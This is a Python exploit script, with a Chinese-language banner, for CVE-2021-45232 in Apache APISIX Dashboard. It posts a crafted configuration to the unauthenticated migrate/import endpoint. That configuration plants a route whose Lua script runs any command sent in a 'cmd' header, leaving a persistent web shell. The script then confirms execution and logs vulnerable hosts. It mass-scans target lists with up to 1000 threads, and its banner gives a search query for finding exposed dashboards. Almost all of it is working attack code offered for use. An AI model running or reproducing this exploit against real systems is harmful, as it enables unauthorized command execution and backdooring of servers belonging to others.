Apache APISIX Dashboard rce.py

import requests
import re
import argparse
import threading
import sys
import urllib3
import argparse
import urllib.request
import ssl
import base64

import zlib
import json
import random
import string
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()


def banner():
    print("""
        //    /$$$$$$                                          /$$       /$$   /$$                           /$$
        //   /$$__  $$                                        | $$      | $$  | $$                          | $$
        //  | $$  \__/ /$$  /$$  /$$  /$$$$$$   /$$$$$$   /$$$$$$$      | $$  | $$  /$$$$$$  /$$$$$$$   /$$$$$$$
        //  |  $$$$$$ | $$ | $$ | $$ /$$__  $$ /$$__  $$ /$$__  $$      | $$$$$$$$ |____  $$| $$__  $$ /$$__  $$
        //   \____  $$| $$ | $$ | $$| $$  \ $$| $$  \__/| $$  | $$      | $$__  $$  /$$$$$$$| $$  \ $$| $$  | $$
        //   /$$  \ $$| $$ | $$ | $$| $$  | $$| $$      | $$  | $$      | $$  | $$ /$$__  $$| $$  | $$| $$  | $$
        //  |  $$$$$$/|  $$$$$/$$$$/|  $$$$$$/| $$      |  $$$$$$$      | $$  | $$|  $$$$$$$| $$  | $$|  $$$$$$$
        //   \______/  \_____/\___/  \______/ |__/       \_______/      |__/  |__/ \_______/|__/  |__/ \_______/
        //
        //
        //
    	""")
    print('''
        Apache APISIX Dashboard 任意命令执行 \n
        作者：孤桜懶契 \n
        fofa 语句：title="Apache APISIX Dashboard" \n
        影响范围：Apache APISIX Dashboard < 2.10.1 \n
        批量检测：python3 xxx.py -f/--file target.txt  \n
        个人博客：gylq.gitee.io \n
        公众号：渗透安全团队
        ''')


eval_config = {
    "Counsumers": [],
    "Routes": [
        {
            "id": str(random.randint(100000000000000000, 1000000000000000000)),
            "create_time": 1640674554,
            "update_time": 1640677637,
            "uris": [
                "/rce"
            ],
            "name": "rce",
            "methods": [
                "GET",
                "POST",
                "PUT",
                "DELETE",
                "PATCH",
                "HEAD",
                "OPTIONS",
                "CONNECT",
                "TRACE"
            ],
            "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
            "status": 1
        }
    ],
    "Services": [],
    "SSLs": [],
    "Upstreams": [],
    "Scripts": [],
    "GlobalPlugins": [],
    "PluginConfigs": []
}

def calc_crc(data):
    crc32 = zlib.crc32(data) & 0xffffffff
    return crc32.to_bytes(4, byteorder="big")

# 随意一个后缀
def random_str():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=6))

def check(url, data):
    data = json.dumps(data).encode()
    crc32 = calc_crc(data)

    proxies = {
        "http": 'http://127.0.0.1:8080',
        "https": 'http://127.0.0.1:8080'
    }

    files = {"file": ("data", data + crc32, "text/data")}
    try:
        resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False,timeout=4)
    # print(resp.text)
        if resp.json().get("code") == 0:
            head = {
                'cmd': 'id',
            }
            url = url[:url.index(":", 6) + 1]
            url = url + "9080"
            vul_target = url+"/"+url_vul_path
            try:
                rep=requests.get(url=vul_target,headers=head,timeout=3)

                if "uid" in rep.text:
                    print(f"[+] 存在命令执行漏洞：curl {vul_target} -H \"cmd: whoami\"")
                    print("[*] 执行结果如下：\n")
                    print("[+]",rep.text.strip())
                    with open("CVE-2021-45232-RCE.txt", "a+") as a:
                        a.write(f"[+] 存在命令执行漏洞：curl {vul_target} -H \"cmd: whoami\"\n")
                else:
                    print("[-] Attack failed ！")
            except:
                        print("[*] Connect Timeout!")
        else:
            print("attack error")
    except:
        print("[*] Connect Timeout!")

url_vul_path = random_str()
eval_config["Routes"][0]["uris"] = ["/" + url_vul_path]
eval_config["Routes"][0]["name"] = url_vul_path




def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {0}'.format(url))


# 主要执行
def main():
    parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')  # 描述

    parser.add_argument('-f', '--file', help='Please Input a url.txt!', default='')  # 传入值

    args = parser.parse_args()  # 解析分解
    with open(args.file, "r") as f:   # 文件
        gitlab = f.read().split("\n")  # 分割
        # for url in gitlab:
        #     target(url,dnslog)
        i = 0
        # print(len(gitlab) 总长度
        while True:
            if i < len(gitlab) and threading.active_count() <= 1000:  # 50线程
                if gitlab[i].strip() != '':  # 去掉空格
                    url_path = format_url(gitlab[i].strip())
                    url_target = format_url(url_path)  # 检查格式
                    t = threading.Thread(target=check, args=(url_target,eval_config,))
                    t.start()
                    i += 1
                    print("[*] 剩下数量：", i, "/", len(gitlab))
            if i == len(gitlab) and threading.active_count() == 1:
                print("[*] done result write in \"CVE-2021-45232-RCE.txt\" ! ")
                break
    f.close()


def remove_duplicates(path):
    lines_seen = set()
    outfile = open(f"{path}.out", 'a+')
    f = open(path, 'r')
    for line in f:
        if line not in lines_seen:
            outfile.write(line)
            lines_seen.add(line)
    outfile.close()
    f.close()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        banner()
        sys.exit()
    banner()
    main()